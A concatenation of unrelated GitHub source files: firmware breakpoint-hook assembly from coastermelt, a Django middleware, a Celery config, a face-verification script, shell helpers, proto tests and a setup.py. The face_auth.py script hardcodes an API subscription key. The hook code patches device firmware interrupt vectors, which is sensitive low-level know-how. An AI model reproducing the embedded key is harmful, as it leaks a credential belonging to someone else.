@ in FIQ mode) and CPSR is fine, but all of r13-r15 need work.
@
@ For r15, there's some vestigial ARM weirdness happening.
@ The hardware always sets lr = faulting_instruction + 4,
@ which would make sense as a return address in 32-bit ARM
@ mode. But with Thumb, now we need to care about the width
@ of the instruction just to calculate a return address.
@
@ But actually, we don't want the return address just yet.
@ The hook should see PC pointing to the breakpoint, then
@ we should advance past that instruction when we execute
@ the relocated code.
sub r0, lr, #4 @ After data abort, lr is faulting_instruction+4
str r0, [sp, #8+4*15] @ Store to regs[15]
@ For r13-r14, we need to take a quick trip into the saved processor
@ mode to retrieve them. If we came from user mode, we'll need to use
@ system mode to read the registers so we don't get ourselves stuck.
bic r8, r10, #0xf @ Transfer low 4 mode bits
ands r9, r11, #0xf
orreq r9, r9, #0x1f @ If user mode, switch to system mode
orr r8, r9
msr cpsr_c, r8 @ Quick trip...
mov r4, r13
mov r5, r14
msr cpsr_c, r10 @ Back to the handler's original mode
str r4, [sp, #8+4*13]
str r5, [sp, #8+4*14]
@ Now our regs[] should be consistent with the state the system was in
@ before hitting our breakpoint. Call the C++ handler! (Preserves r8-r13)
add r0, sp, #8 @ r0 = regs[]
adr lr, from_handler @ Long call to C++ handler
ldr r1, =handler_address+1
bx r1
from_handler:
@ The C++ handler may have modified any of regs[-1] through regs[15].
@
@ We need to run the relocated instruction before leaving too.
@ Our approach will be to load as much of this state back into the CPU
@ as we care to, run the relocated instruction, then move the state back
@ where it needs to go so we can return from the ISR.
ldr r11, [sp, #4] @ Refresh r11 from regs[-1]
ldr r0, [sp, #8+4*15] @ Load hook pc from regs[15]
add r0, #hook_instruction_size+1
str r0, [sp, #72+4*13] @ Correct Thumb return address goes in ISR frame
ldr r12, =0xf000000f @ Transfer condition code and mode bits
bic r8, r10, r12 @ Insert into handler cpsr (keep interrupt state)
and r9, r11, r12
tst r9, #0xf @ If low nybble is zero, user mode
orreq r9, r9, #0x1f @ If user mode, switch to system mode
orr r8, r9
ldr r4, [sp, #8+4*13] @ Prepare r13
ldr r5, [sp, #8+4*14] @ Prepare r14
add r12, sp, #8 @ Use r12 to hold regs[] while we're on the user stack
msr cpsr_c, r8 @ Back to the saved mode & condition codes
mov r13, r4 @ Replace saved r13-14 with those from our stack
mov r14, r5
ldm r12, {r0-r11} @ Restore r0-r11 temporarily
%(reloc)s @ Relocated and reassembled code from the hook location
@ We only rely on it preserving pc and r12.
add r12, #4*16 @ When we save, switch from the regs[] copy to the return frame
stm r12, {r0-r11} @ Save r0-r11, capturing modifications
mrs r11, cpsr @ Save cpsr from relocated code
sub r12, #8+4*16 @ Calculate our abort-mode sp from r12
ldr r10, [r12] @ Reload breakpoint_psr from abort-mode stack
msr cpsr_c, r10 @ Back to abort-mode, and to our familiar stack
ldr r1, [sp, #4] @ Load saved cpsr from regs[-1] again
ldr r0, =0xf0000000 @ Mask for condition codes
bic r1, r0
and r0, r11 @ Condition codes from after relocated instruction
orr r0, r1 @ Combine new condition codes with regs[-1]
msr spsr_cxsf, r0 @ Into spsr, ready to restore in ldm below
add sp, #8+4*16 @ Skip back to return frame
ldmfd sp!, {r0-r12, pc}^ @ Return from SVC, and restore cpsr
""" % locals(), defines=locals(), thumb=False)
# Install the ISR, then finally the code overlay. Now our hook is active!
bkpt_prefetch_abort_vector = 0xc
ivt_set(d, bkpt_prefetch_abort_vector, isr_address)
if target_already_mapped:
# We're dealing with a hook target that already has an SRAM mapping,
# instead of completing it by moving the overlay, we complete by
# writing data to the existing mapping.
poke_words(d, ovl_address, words_from_string(patched_ovl_data))
else:
overlay_set(d, ovl_address, ovl_size//4)
# Look at our handiwork in the disassembler
verify_asm = disassemble_context(d, hook_address, size=10)
asm_diff = side_by_side_disassembly(
disassembly_lines(ovl_asm), # Original unpatched hook on the left
disassembly_lines(verify_asm), # Fresh context disassembly on the right
)
if verbose:
print("* Handler compiled to 0x%x bytes, loaded at 0x%x" % (handler_len, handler_address))
print("* ISR assembled to 0x%x bytes, loaded at 0x%x" % (isr_len, isr_address))
print("* Hook at 0x%x, returning to 0x%x" % (hook_address, return_address))
print("* RAM overlay, 0x%x bytes, loaded at 0x%x" % (ovl_size, ovl_address))
if show_asm_diff:
print(asm_diff)
# Most common failure mode I'm seeing now is that the overlay gets stolen or
# the truncation bug just breaks things and the patch doesn't install.
assert verify_asm.find('bkpt') >= 0
| {
"content_hash": "6f7b75682f54aceed6e02c9809266715",
"timestamp": "",
"source": "github",
"line_count": 327,
"max_line_length": 103,
"avg_line_length": 43.22935779816514,
"alnum_prop": 0.5870826259196378,
"repo_name": "scanlime/coastermelt",
"id": "e8b1c9b3114612b49883d96b07d8bae4633cb823",
"size": "14223",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "backdoor/hook.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Assembly",
"bytes": "9476"
},
{
"name": "C",
"bytes": "25287"
},
{
"name": "C++",
"bytes": "46531"
},
{
"name": "Makefile",
"bytes": "2882"
},
{
"name": "Python",
"bytes": "346050"
}
],
"symlink_target": ""
} |
from django.conf import settings
from .models import Achievement
from .utils import check_achievement_plain
class AutoAchievementChecker(object):
def process_response(self, request, response):
if not getattr(request, 'user'):
return response
user = request.user
try:
methods = [i.lower() for i in settings.ACHIEVEMENT_MIDDLEWARE_REQUEST_METHODS]
except:
methods = []
if request.method.lower() in methods and user and user.is_authenticated():
for obj in Achievement.objects.all().order_by('bonus'):
check_achievement_plain(self, user, obj.key)
return response
| {
"content_hash": "b8b4dfe56983d7844f58be0be2945d02",
"timestamp": "",
"source": "github",
"line_count": 23,
"max_line_length": 84,
"avg_line_length": 27.130434782608695,
"alnum_prop": 0.7035256410256411,
"repo_name": "ogirardot/django-achievements",
"id": "3aaa3fe0727a54cd3e8d9b3805bdfed6b83e3194",
"size": "625",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "achievements/middleware.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "34856"
},
{
"name": "Shell",
"bytes": "5131"
}
],
"symlink_target": ""
} |
from __future__ import absolute_import
import os
from datetime import timedelta
from celery import Celery
from celery.schedules import crontab
# set the default Django settings module for the 'celery' program.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'server.settings')
from django.conf import settings # noqa
import logging
logger = logging.getLogger('tasks')
celery_app = Celery('server')
# Using a string here means the worker will not have to
# pickle the object when using Windows.
celery_app.config_from_object('django.conf:settings')
celery_app.autodiscover_tasks(lambda: settings.INSTALLED_APPS)
celery_app.conf.update(
CELERY_ROUTES={
"proj.tasks.add": {"queue": "hipri"}, # 把add任务放入hipri队列
# 需要执行时指定队列 add.apply_async((2, 2), queue='hipri')
},
CELERYBEAT_SCHEDULE={
# "confirm-classes":{
# "task":"app.tasks.autoConfirmClasses",
# "schedule":timedelta(
# seconds=15),
# },
"notify-comment": {
"task": "app.tasks.autoNotifyComment",
"schedule": timedelta(
seconds=15),
},
"remind-classes": {
"task": "app.tasks.autoRemindClasses",
"schedule": timedelta(
seconds=15),
},
"remind-coupons": {
"task": "app.tasks.autoRemindCoupons",
"schedule": timedelta(
seconds=15),
},
"cancel-orders": {
"task": "app.tasks.autoCancelOrders",
"schedule": timedelta(
seconds=15),
},
"add-teaching-age": {
"task": "app.tasks.autoAddTeacherTeachingAge",
"schedule": crontab(hour=0, minute=30),
},
"school-income-records": {
"task": "app.tasks.autoCreateSchoolIncomeRecord",
"schedule": crontab(minute=39, hour=2, day_of_week='wed'),
},
"mistakes-push": {
"task": "app.tasks.autoNotifyExerciseMistakes",
"schedule": timedelta(minutes=1),
},
},
)
if __name__ == "__main__":
celery_app.start()
@celery_app.task(bind=True)
def debug_task(self):
logger.debug('Request: {0!r}'.format(self.request))
| {
"content_hash": "66078957e4619a7b3a85cdfa2549bbfd",
"timestamp": "",
"source": "github",
"line_count": 76,
"max_line_length": 70,
"avg_line_length": 29.539473684210527,
"alnum_prop": 0.578173719376392,
"repo_name": "malaonline/Server",
"id": "ac1a0cf93c8fd18ad10400fd344b6f2f9133adac",
"size": "2277",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "server/server/celery.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "236251"
},
{
"name": "HTML",
"bytes": "532032"
},
{
"name": "JavaScript",
"bytes": "580515"
},
{
"name": "Python",
"bytes": "987542"
},
{
"name": "Shell",
"bytes": "1881"
}
],
"symlink_target": ""
} |
import requests
import json
#ANNA_KENDRICK_1 = "http://hellogiggles.com/wp-content/uploads/2015/04/10/anna-kendrick-pitch-perfect-650-430.jpg"
#ANNA_KENDRICK_2 = "http://zntent.com/wp-content/uploads/2015/02/Anna-Kendrick-2.jpg"
DETECT_URL = "https://api.projectoxford.ai/face/v1.0/detect?returnFaceId=true&returnFaceLandmarks=false&returnFaceAttributes=age"
VERIFY_URL = "https://api.projectoxford.ai/face/v1.0/verify"
FaceAPIHeaders = {
"Content-Type": "application/json",
"Ocp-Apim-Subscription-Key": "38c44ac804c44f6e97673d815163a1db"
}
TEST_IMAGE = "http://sparck.co/faces/ADAM.jpg"
FACES_DB = {
"JAY":"http://sparck.co/faces/JAY.jpg",
"ADAM":"http://sparck.co/faces/ADAM.jpg",
"ANNA":"http://sparck.co/faces/anna.jpg",
"JAHAN":"http://sparck.co/faces/JAHAN.jpg"
}
#JAY = "http://sparck.co/faces/jay.jpg"
#ANNA = "http://sparck.co/faces/anna.jpg"
#FACES_DB = [JAY, ANNA]
# dictionary of names -> faceIds
faceDict = {}
for key in FACES_DB:
res = requests.post(DETECT_URL, data=json.dumps({"url":FACES_DB[key]}), headers=FaceAPIHeaders)
# TODO: check requests works?
detectDict = json.loads(res.content)[0]
faceDict[key] = detectDict["faceId"]
#print(faceDict)
# get TEST_IMAGE faceId
res = requests.post(DETECT_URL, data=json.dumps({"url":TEST_IMAGE}), headers=FaceAPIHeaders)
# TODO: check requests works?
detectDict = json.loads(res.content)[0]
testImgId = detectDict["faceId"]
# verify faceIds
# dictionary of names -> confidence score
nameScores = {}
for key in faceDict:
res = requests.post(VERIFY_URL, data=json.dumps({"faceId1":testImgId, "faceId2":faceDict[key]}), headers=FaceAPIHeaders)
verifyDict = json.loads(res.content)
nameScores[key] = verifyDict["confidence"]
print(nameScores)
# detect and get faceIds
#detectURL = "https://api.projectoxford.ai/face/v1.0/detect?returnFaceId=true&returnFaceLandmarks=false&returnFaceAttributes=age"
#FaceAPIHeaders = {
# "Content-Type": "application/json",
# "Ocp-Apim-Subscription-Key": "38c44ac804c44f6e97673d815163a1db"
# }
# res1 = requests.post(detectURL, data=json.dumps({"url":ANNA_KENDRICK_1}), headers=FaceAPIHeaders)
# res2 = requests.post(detectURL, data=json.dumps({"url":ANNA_KENDRICK_2}), headers=FaceAPIHeaders)
# # prints response
# #print(res.content)
# # prints faceId
# detectDict1 = json.loads(res1.content)[0] # for the first line
# print(detectDict1["faceId"])
# detectDict2 = json.loads(res2.content)[0]
# print(detectDict2["faceId"])
# # verify faceIds
# verifyURL = "https://api.projectoxford.ai/face/v1.0/verify"
# res = requests.post(verifyURL, data=json.dumps({"faceId1":detectDict1["faceId"], "faceId2":detectDict2["faceId"]}), headers=FaceAPIHeaders)
# # prints response
# print(res.content)
########################
#NOT USEFUL BELOW HERE
########################
# file object.p
#DATA = open("facescrub_actors.txt", "r")
#nameSet = set()
# def checkValid(arg):
# if arg[0] in nameSet:
# # we already had URL for this name
# return False
# try:
# r = requests.get(arg[3])
# #r = requests.get("asdfasdfdsfsafsaf.com")
# nameSet.add(arg[0])
# return r.status_code == 200
# except requests.exceptions.RequestException:
# return False
# # split on tabs
# res = map((lambda x: x.split("\t")), DATA)
# # filter out invalid URL
# valid = filter(checkValid, res)
# #for data in valid:
# # print(data[3])
# count = 0
# retArray = []
# #nameSet = set()
# for data in valid:
# #if data[0] not in nameSet:
# newDictionary = {}
# newDictionary["name"] = data[0]
# newDictionary["url"] = data[3]
# newDictionary["id"] = count
# retArray.append(newDictionary)
# #nameSet.add(data[0])
# count += 1
# #print(repr(retArray))
# retJSON = json.dumps(retArray, sort_keys=True, indent=4, separators=(",", ": "))
# #print(retJSON)
# f = open("faces.json", "w")
# f.write(retJSON)
# # c = httplib.HTTPConnection('www.example.com')
# # c.request("HEAD", '')
# # if c.getresponse().status == 200:
# # print('web site exists')
# # a = [1,2,3,4]
# # def add1(arg):
# # return arg+1
# # out = map(add1, a)
# # for b in out:
# # print(str(b)) | {
"content_hash": "e12154b23c6515fa52c4d611f8ed8d9b",
"timestamp": "",
"source": "github",
"line_count": 161,
"max_line_length": 141,
"avg_line_length": 25.46583850931677,
"alnum_prop": 0.6809756097560976,
"repo_name": "jayendrajog/LA-Hacks-2016",
"id": "adfd8594ac8ad7fb2ed436786f90cf1c20a70046",
"size": "4334",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "face_auth.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Go",
"bytes": "26936"
},
{
"name": "HTML",
"bytes": "32833"
},
{
"name": "JavaScript",
"bytes": "27884"
},
{
"name": "Makefile",
"bytes": "261"
},
{
"name": "Python",
"bytes": "6298"
}
],
"symlink_target": ""
} |
"""
experipy.system
~~~~~~~~~~~~~~~
This module provides a number of system and shell tools for helping to
specify common tasks within the experipy grammar.
"""
from os import path
from .grammar import Executable
def cd(dirname):
return Executable("cd", [dirname])
def cp(target, dest, opts=[]):
return Executable("cp", opts + ['-R', '-t', dest, target])
def mkdir(dirname, make_parents=False):
opts = []
if make_parents:
opts.append("--parents")
return Executable("mkdir", opts + [dirname])
def mkfifo(pipename):
return Executable("mkfifo", [pipename])
def mv(target, dest):
return Executable("mv", [target, dest])
def rm(*files):
return Executable("rm", ["-rf"] + list(files))
def wait():
return Executable("wait")
def python_script(script, sopts=[], pythonexe="python", **kwargs):
return Executable(pythonexe, [path.abspath(script)] + sopts, **kwargs)
def java_app(jarfile, popts=[], javaexe="java", jopts=[], **kwargs):
jarfile = path.abspath(jarfile)
return Executable(javaexe, jopts + ["-jar", jarfile] + popts, **kwargs)
| {
"content_hash": "1526f0abbfec046695c7b3822ff1d7cf",
"timestamp": "",
"source": "github",
"line_count": 49,
"max_line_length": 75,
"avg_line_length": 23.040816326530614,
"alnum_prop": 0.6359610274579274,
"repo_name": "Elemnir/experipy",
"id": "d3484bd579ec7f9f459039b4bb531879780085a9",
"size": "1129",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/experipy/system.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "27478"
}
],
"symlink_target": ""
} |
import proto
def test_singly_nested_message():
class Foo(proto.Message):
class Bar(proto.Message):
value = proto.Field(proto.INT32, number=1)
bar = proto.Field(proto.MESSAGE, number=1, message=Bar)
foo = Foo(bar=Foo.Bar(value=42))
assert foo.bar.value == 42
def test_multiply_nested_message():
class Foo(proto.Message):
class Bar(proto.Message):
class Baz(proto.Message):
value = proto.Field(proto.INT32, number=1)
baz = proto.Field(proto.MESSAGE, number=1, message=Baz)
bar = proto.Field(proto.MESSAGE, number=1, message=Bar)
foo = Foo(bar=Foo.Bar(baz=Foo.Bar.Baz(value=42)))
assert foo.bar.baz.value == 42
def test_forking_nested_messages():
class Foo(proto.Message):
class Bar(proto.Message):
spam = proto.Field(proto.STRING, number=1)
eggs = proto.Field(proto.BOOL, number=2)
class Baz(proto.Message):
class Bacon(proto.Message):
value = proto.Field(proto.INT32, number=1)
bacon = proto.Field(proto.MESSAGE, number=1, message=Bacon)
bar = proto.Field(proto.MESSAGE, number=1, message=Bar)
baz = proto.Field(proto.MESSAGE, number=2, message=Baz)
foo = Foo(
bar={"spam": "xyz", "eggs": False},
baz=Foo.Baz(bacon=Foo.Baz.Bacon(value=42)),
)
assert foo.bar.spam == "xyz"
assert not foo.bar.eggs
assert foo.baz.bacon.value == 42
| {
"content_hash": "6c5ddec87e86be1165ef4039db0a3234",
"timestamp": "",
"source": "github",
"line_count": 50,
"max_line_length": 71,
"avg_line_length": 29.74,
"alnum_prop": 0.6086079354404842,
"repo_name": "googleapis/proto-plus-python",
"id": "41af9507f22e3e18e58f4c629967754d082bf352",
"size": "2063",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "tests/test_message_nested.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "244655"
}
],
"symlink_target": ""
} |
from setuptools import setup, find_packages
from cybots import __version__
setup(
name='{{ cybots }}',
version=__version__,
url='http://host/',
author='TrungAnh',
author_email='[email protected]',
packages=find_packages(),
include_package_data=True,
scripts=['manage.py'],
install_requires=(
'django>1.7',
)
)
| {
"content_hash": "5b4b231fce01fa9be96311fc26e51373",
"timestamp": "",
"source": "github",
"line_count": 19,
"max_line_length": 43,
"avg_line_length": 19.263157894736842,
"alnum_prop": 0.6120218579234973,
"repo_name": "trungnt13/django_template",
"id": "7c0496894ad30fede4df7f27fb285aa02eb6d348",
"size": "366",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "93"
},
{
"name": "Python",
"bytes": "11659"
},
{
"name": "Shell",
"bytes": "329"
}
],
"symlink_target": ""
} |
Subsets and Splits